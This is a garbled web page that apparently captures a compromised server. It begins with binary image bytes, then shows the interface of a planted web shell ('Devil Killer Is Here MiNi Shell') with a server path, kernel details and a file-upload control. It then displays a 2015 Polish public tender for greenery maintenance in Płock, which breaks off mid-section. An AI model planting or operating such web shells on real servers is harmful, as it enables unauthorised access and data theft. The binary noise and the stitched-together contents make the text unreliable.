JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151026/285474-N-2015.html

<p class="kh_header"><b>Płock: Konserwacja zieleni na terenach stanowiących własność i współwłasność Gminy - Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o. o. w Płocku</b><br>
<b>Numer ogłoszenia: 285474 - 2015; data zamieszczenia: 26.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o.o. , ul. Polna 7, 09-400 Płock, woj. mazowieckie, tel. 24 3640310, faks 24 3640311.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzgm-plock.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością ze 100% udziałem Gminy Miasto Płock.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja zieleni na terenach stanowiących własność i współwłasność Gminy - Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej - TBS Sp. z o. o. w Płocku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na prowadzeniu zabiegów pielęgnacyjnych zieleni i obejmuje  dwie części: CZEŚĆ I  CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW, CIĘCIA FORMUJĄCE RABAT I KRZEWÓW ORAZ NASADZENIA DRZEW I KRZEWÓW. CZEŚĆ II  WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH, USUNIĘCIE POŁAMANYCH PALIKÓW PRZY ROSNĄCYCH DRZEWKACH, USUWANIE WIATROŁOMÓW. Prace wykonywane będą na terenach stanowiących własność i współwłasność Gminy Miasto Płock lub będących w jej posiadaniu, administrowanych przez Miejski Zakład Gospodarki Mieszkaniowej    TBS Sp. z o. o. w Płocku - Rejon Obsługi Mieszkańców Nr III, IV , V. Termin realizacji zamówienia od dnia podpisania umowy do dnia  25.11.2015 r. ZAKRES ZADANIA  CZĘŚĆ I: CIĘCIA PIELĘGNACYJNE I CIĘCIA TECHNICZNE W KORONIE DRZEW, CIĘCIA FORMUJĄCE RABAT I KRZEWÓW ORAZ NASADZENIA DRZEW I KRZEWÓW. 1.Cięcia pielęgnacyjne (cięcia prześwietlające, sanitarne, korygujące, odmładzające i formujące) i cięcia techniczne (cięcia techniczne wzdłuż ciągów komunikacyjnych, w energetyce i telekomunikacji, w budownictwie) w koronie drzew. 2.Nasadzenia drzew w ramach rekompensaty za usunięte drzewa, na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska  Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. UWAGA: KORONA DRZEW POWINNA BYĆ UFORMOWANA NA WYSOKOŚCI: 2,20 DO 2,50 M. 3. Dokonanie nasadzeń drzew - sposób rozliczania nasadzeń  wg katalogu KNR Nr 2 21  Tereny zieleni MGPiB 2005 r. Materiał do nasadzeń powinien odpowiadać normie: PN R 87023 Materiał szkółkarski. Ozdobne drzewa i krzewy liściaste oraz PN -R-65022 Materiał siewny. Nasiona roślin rolniczych. Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: 1.Cięcia pielęgnacyjne i techniczne w koronie drzew  do 140 szt. 2.Cięcia formujące rabat (skupisk roślinnych)  do 5 276,60 m2 3.Cięcia formujące krzewów 92,00 m2 4.Nasadzenia drzew  do 24 szt. 5.Nasadzenia krzewów 30 szt. 6.Uprzątnięcie, wywóz i utylizacja odpadów powstałych w wyniku wykonywania prac wymienionych                                              w punkcie 1,2 i 3. UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie. Wykonawca zobowiązany jest do przekazania Zamawiającemu zbiorczej pisemnej informacji o ilości i sposobie zagospodarowania odpadów powstałych w trakcie wykonywania prac w ramach umowy(CZĘŚĆ I) za cały okres trwania umowy   w terminie do 7 dni od zakończenia umowy lub na każde żądanie Zamawiającego. Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu. Ilości i gatunki drzew zostaną każdorazowo określone przez Zamawiającego w zleceniu. Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części I zamówienia. Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Wykonawca udzieli minimum 1 roku gwarancji na przedmiotowe zadanie. Do wykonywania robót związanych z cięciem pielęgnacyjnym i cięciem technicznym w koronie drzew oraz nasadzeniem drzew i krzewów należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT DZIAŁ   3: 3.1.Wymagania ogólne, 3.2. Sprzęt stosowany do pielęgnacji terenu. WYKAZ GATUNKÓW I ODMIAN DRZEW DO NASADZENIA WRAZ Z DANYMI TECHNICZNYMI: Nazwa gatunku odmiana; Ilość w szt. : Głóg pośredni (Paul s Scarlett)obwód pnia mierzony na wysokości 100 cm min.14) 16 cm szt.1, Klon pospolity  (Red Shine)obwód pnia mierzony na wysokości 100 cm min.14 cm szt.2, Klon polny (Red Shine) obwód pnia mierzony na wysokości 100 cm min.14 )16 cm szt.7, Grusza drobnolistna (Chanticleer) obwód pnia mierzony na wysokości 100 cm min.14 cm szt.4 , Wiśnia kanzan obwód pnia mierzony na wysokości 100 cm min.16 ) 18 cm szt.2, Brzoza Doorembos obwód pnia mierzony na wysokości 100 cm min. 14 ) 16 cm szt. 2 , Lipa drobnolistna (Greenspire) obwód pnia mierzony na wysokości 100 cm min.12 cm )16 cm szt. 6 Razem 24 szt. WYKAZ ODMIAN KRZEWÓW DO NASADZENIA. Nazwa odmiany, ilość w szt.: Tawuła japońska  goldmund szt. 5, Dereń sibirica szt. 10, Forsycja szt. 15 Razem 30 szt. ZAKRES ZADANIA CZĘŚĆ II: WYCINKA DRZEW I FREZOWANIE KARP KORZENIOWYCH. USUNIĘCIE POŁAMANYCH PALIKÓW PRZY ROSNĄCYCH DRZEWKACH, USUWANIE WIATROŁOMÓW. 1.Wycinka drzew oraz frezowanie karp korzeniowych, usunięcie połamanych palików przy rosnących drzewkach, usuwanie wiatrołomów wg potrzeb zgłaszanych przez Rejony Obsługi Mieszkańców.2.Wycinka drzew na podstawie decyzji wydanych przez: Wydział Kształtowania Środowiska - Oddział Ochrony Środowiska oraz Biuro Miejskiego Konserwatora Zabytków Urzędu Miasta Płocka. 3.Wyrównanie terenu, a w razie konieczności uzupełnienie ubytków ziemią i jej ubicie wraz z uprzątnięciem, wywiezieniem i utylizacją odpadów powstałych w wyniku wykonywania prac wymienionych w punkcie 1.  Zakres zabiegów pielęgnacyjnych w ujęciu ilościowym: Wycinka drzew  ok. 41 sztuk, Frezowanie karp korzeniowych  ok. 41 sztuk  Usunięcie połamanych palików przy rosnących drzewkach w kpl. - do 193  (W jednym komplecie są trzy szt. palików)Usuwanie wiatrołomów (awarie)  do 13 szt.  wg przyjętych założeń, jak niżej: PRZYJĘTE ZAŁOŻENIA W ZAKRESIE USUWANIA WIATROŁOMÓW:           Wyszczególnienie przyjęte założenia: Grupa I  wiatrołomy o obwodzie pnia: do 50 cm  Przewidywane wiatrołomy: 3 szt. o obw. 50 cm, 1 szt. o obw. 40 cm razem 4 szt,, Grupa II wiatrołomy o obwodzie pnia:  51 cm do  100 cm Przewidywane wiatrołomy: 6 szt. o obw. 75 cm, 1 szt. o obw. 100 cm razem 7 szt., Grupa III  wiatrołomy o obwodzie pnia:  101 cm do 200 cm Przewidywane wiatrołomy: 2 szt. o obw. 190 cm razem 2 szt. Łącznie 13 szt. UWAGA: Wykonawca zobowiązany jest do przedstawienia dowodu przekazania odpadów do utylizacji lub oświadczenia o zagospodarowaniu odpadów we własnym zakresie. Wykonawca zobowiązany jest do przekazania Zamawiającemu zbiorczej pisemnej informacji o ilości i sposobie zagospodarowania odpadów powstałych w trakcie wykonywania prac w ramach umowy za cały okres trwania umowy (CZĘŚĆ II)  w terminie do 7 dni od zakończenia umowy lub na każde żądanie Zamawiającego Roboty będące przedmiotem zamówienia będą wykonywane przez Wykonawcę każdorazowo wyłącznie na pisemne zlecenie wystawione przez upoważnionych przez Zamawiającego pracowników Rejonów Obsługi Mieszkańców w zakresie, miejscu i terminie określonym w tym zleceniu. Ilości i gatunki drzew oraz ilości kpl. połamanych palików oraz wiatrołomów zostaną każdorazowo określone przez Zamawiającego w zleceniu.  Z uwagi na możliwość wystąpienia nieprzewidzianych zdarzeń i okoliczności oraz zmiennych warunków atmosferycznych, Zamawiający zastrzega sobie prawo do zmian zakresu ilościowego Części II zamówienia. Wykonawcy nie przysługuje prawo zgłoszenia roszczeń do Zamawiającego z tytułu zmniejszenia zakresu usług w stosunku do zakresu określonego w SIWZ i w umowie oraz nie uzyskania wartości usług określonej na podstawie złożonej oferty. Wykonawca udzieli minimum 1 roku gwarancji  na przedmiotowe zadanie. Do wykonywania robót związanych z usunięciem drzew  należy stosować sprzęt wymieniony w SPECYFIKACJI TECHNICZNEJ WYKONANIA I ODBIORU ROBÓT DZIAŁ 3: 3.1.Wymagania ogólne, 3.2. Sprzęt stosowany do pielęgnacji terenu..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.00.00.00-0, 77.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca Przystępując do przetargu jest zobowiązany wnieść wadium w wysokości na Część II 	-     	   800,00    złotych (słownie: osiemset złotych)
		na Część III	-	   500,00    złotych (słownie: pięćset złotych)
Łącznie wadium dla wszystkich Części zamówienia: 1.300,00 zł (tysiąc trzysta złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie dotyczy Części I, Części II.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca  wykaże, że wykonał lub wykonuje w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:
a)	jedną usługę w zakresie zabiegów pielęgnacyjnych w drzewostanie, a także nasadzenia drzew  o wartości co najmniej 15.000,00 zł brutto dotyczy Części I
b)	jedną usługę w zakresie wycinki drzew i frezowania karp korzeniowych o wartości co najmniej 10.000,00 zł brutto dotyczy Części II
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie dotyczy Części I, Części II.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje co najmniej:
Część I
a)	co najmniej 1 osobą przewidzianą do kierowania pracami objętymi przedmiotem zamówienia, posiadającą wykształcenie wyższe lub średnie kierunkowe: architektura krajobrazu lub ogrodnictwo lub leśnictwo i minimum 12 miesięczne doświadczenie w wykonywaniu prac związanych z gospodarką zieleni. Dodatkowo osoba ta powinna posiadać zezwolenie lub zaświadczenie Konserwatora Zabytków na prowadzenie prac w strefie ochrony konserwatorskiej.
b)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych I stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
c)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych II stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
d)	co najmniej 1 osobą z wykształceniem ogrodniczym lub leśnym i minimum 12 miesięcznym doświadczeniem w wykonywaniu prac ogrodniczych.

Część II
a)	co najmniej 1 osobą przewidzianą do kierowania pracami objętymi przedmiotem zamówienia, posiadającą wykształcenie wyższe lub średnie kierunkowe: architektura krajobrazu lub ogrodnictwo lub leśnictwo i minimum 12 miesięczne doświadczenie w wykonywaniu prac związanych z gospodarką zieleni. Dodatkowo osoba ta powinna posiadać zezwolenie lub zaświadczenie Konserwatora Zabytków na prowadzenie prac w strefie ochrony konserwatorskiej.
b)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych I stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
c)	co najmniej 2 osobami posiadającymi kurs pilarzy drzew ozdobnych II stopnia i minimum 12 miesięczne doświadczenie w wykonywaniu pracy w zakresie pielęgnacji drzew,
d)	co najmniej 2 osobami z wykształceniem ogrodniczym lub leśnym i minimum 12 miesięcznym doświadczeniem w wykonywaniu prac ogrodniczych.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:
a)	opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie niższą niż cena oferty	
Uwaga:
1.	W przypadku złożenia oferty na wszystkie Części zamówienia lub na dane wybrane Części zamówienia Zamawiający dopuszcza złożenie jednej polisy, której kwota obejmuje  łączna cenę oferty.
2.	W przypadku złożenia przez Wykonawców polisy o której mowa w pkt 4a) zawierającej kwoty wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku, Zamawiający, jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu na portalu Urzędu Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu na portalu Urzędu Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu na portalu Urzędu Zamówień Publicznych, w którym zostanie on opublikowany.
3.	W przypadku opłacenia składki polisy w ratach Wykonawca załącza dowód opłacenia rat polisy.
Ocena spełnienia warunków wymaganych od wykonawców zostanie dokonana w systemie (spełnia, nie 	spełnia), na podstawie oświadczeń lub dokumentów, jakie mają dostarczyć wykonawcy w celu 	potwierdzenia spełnienia warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
